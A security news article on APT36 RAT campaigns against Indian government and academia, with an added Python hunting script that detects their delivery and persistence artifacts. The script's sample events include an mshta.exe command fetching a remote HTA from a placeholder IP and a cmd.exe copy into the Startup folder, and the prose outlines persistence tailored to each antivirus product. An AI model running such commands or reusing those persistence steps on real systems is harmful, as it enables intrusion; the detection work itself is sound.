
Transparent Tribe Launches New RAT Attacks Against Indian Government and Academia

Indian government agencies, academic institutions, and strategic organizations are under a new wave of cyberattacks attributed to the threat actor Transparent Tribe, also known as APT36. The group is deploying advanced remote access trojans (RATs) that allow persistent control over infected systems.

According to cybersecurity firm CYFIRMA, the campaign relies on deceptive delivery methods, including weaponized Windows shortcut (LNK) files disguised as legitimate PDFs. The shortcut files carry the full content of a genuine PDF so they do not raise suspicion. Once opened, the shortcut runs a remote HTML Application (HTA) script through mshta.exe; the script decrypts the RAT payload and loads it directly into memory while a decoy PDF is shown to the victim.

APT36 has been active since at least 2013 and is known for using a variety of RATs, including CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT. The group is strategically focused on cyber espionage, targeting entities involved in governance, education, and other sensitive sectors in India.

A notable feature of the malware is its ability to adapt persistence techniques based on the antivirus software installed on the compromised system. For instance:

  • Kaspersky: Creates a hidden directory, writes an obfuscated HTA payload, and uses a startup LNK file for persistence.
  • Quick Heal: Establishes persistence with a batch file and malicious LNK, launching the HTA payload through the script.
  • Avast, AVG, Avira: Directly copies the payload into the Startup folder for execution.
  • No recognized antivirus: Combines batch execution, registry-based persistence, and direct payload deployment.

The second-stage HTA payload includes a DLL named iinneldc.dll, which enables full RAT functionality, including remote control, file management, screenshot capture, clipboard access, and process manipulation.
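The delivery chain (LNK launching mshta.exe with a remote HTA) and the Startup-folder and double-extension artifacts listed above are all visible in endpoint process-creation and file-creation telemetry. The following is an added hunting example, not CYFIRMA's or the article's own tooling; the Sysmon-style field names and the sample records are constructed for illustration, and the IP address is a documentation placeholder.

```python
import re

# Sysmon-style records, constructed for this example (Event ID 1 process
# creation and Event ID 11 file creation share the same dict shape here).
SAMPLE_EVENTS = [
    # 0: benign, a real PDF opened in a reader
    {"Image": r"C:\Program Files\Reader\reader.exe",
     "CommandLine": r'"C:\Program Files\Reader\reader.exe" C:\Users\a\Downloads\advisory.pdf',
     "ParentImage": r"C:\Windows\explorer.exe"},
    # 1: explorer.exe (the LNK click) spawning mshta.exe with a remote HTA
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://203.0.113.10/update.hta',
     "ParentImage": r"C:\Windows\explorer.exe"},
    # 2: a browser writing a shortcut that masquerades as a PDF
    {"Image": r"C:\Program Files\Browser\browser.exe",
     "TargetFilename": r"C:\Users\a\Downloads\NCERT-Whatsapp-Advisory.pdf.lnk"},
    # 3: the HTA stage copying a shortcut into the per-user Startup folder
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c copy C:\Users\a\AppData\Local\Temp\x.lnk "C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.lnk"',
     "ParentImage": r"C:\Windows\System32\mshta.exe"},
]

# Rule 1: mshta.exe given an http/https argument, i.e. a remote HTA.
URL_ARG = re.compile(r"\bhttps?://", re.IGNORECASE)
# Rule 2: a document extension immediately followed by .lnk.
DOUBLE_EXT_LNK = re.compile(r"\.(?:pdf|docx?|xlsx?)\.lnk\b", re.IGNORECASE)
# Rule 3: a shortcut, HTA or batch file landing in a Startup folder.
STARTUP_DROP = re.compile(
    r"\\Start Menu\\Programs\\Startup\\[^\\\"]+\.(?:lnk|hta|bat)\b", re.IGNORECASE)

def triage(event):
    """Return the names of the rules a single event matches (possibly none)."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    text = " ".join(event.get(k, "") for k in ("CommandLine", "TargetFilename"))
    hits = []
    if image.endswith("mshta.exe") and URL_ARG.search(cmd):
        hits.append("mshta_remote_hta")
    if DOUBLE_EXT_LNK.search(text):
        hits.append("double_extension_lnk")
    if STARTUP_DROP.search(text):
        hits.append("startup_folder_drop")
    return hits

def hunt(events):
    """Return (index, hits) for every event that matches at least one rule."""
    findings = []
    for i, event in enumerate(events):
        hits = triage(event)
        if hits:
            findings.append((i, hits))
    return findings
```

Run against real telemetry, rule 1 is the highest-signal indicator, since mshta.exe fetching an HTA over the network is rarely legitimate on a workstation.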

Recent campaigns have also used malicious shortcuts disguised as government advisory PDFs, such as “NCERT-Whatsapp-Advisory.pdf.lnk,” to deploy a .NET-based loader that drops additional executables and DLLs. The attack chain includes retrieving an MSI installer from a remote server, displaying a decoy PDF, and establishing long-term persistence through Windows Registry modifications.

CYFIRMA notes that APT36 employs environment profiling, runtime manipulation, and advanced obfuscation to maximize reliability while evading detection. The group’s operations demonstrate continued sophistication in malware delivery and espionage targeting Indian strategic interests.

In a related development, another Indian-origin threat actor, Patchwork (aka Dropping Elephant or Maha Grass), has been linked to attacks targeting Pakistan’s defense sector. Researchers identified a Python-based backdoor distributed via MSBuild loaders and ZIP archives. Patchwork has recently deployed a new trojan, StreamSpy, which uses WebSocket and HTTP protocols for command-and-control (C2) communication.

StreamSpy offers features such as file exfiltration, system reconnaissance, and persistence through registry keys or startup scripts. Security analysts note that StreamSpy and the group's other trojans share characteristics with previously observed RATs, pointing to ongoing tool evolution and collaboration between threat groups.
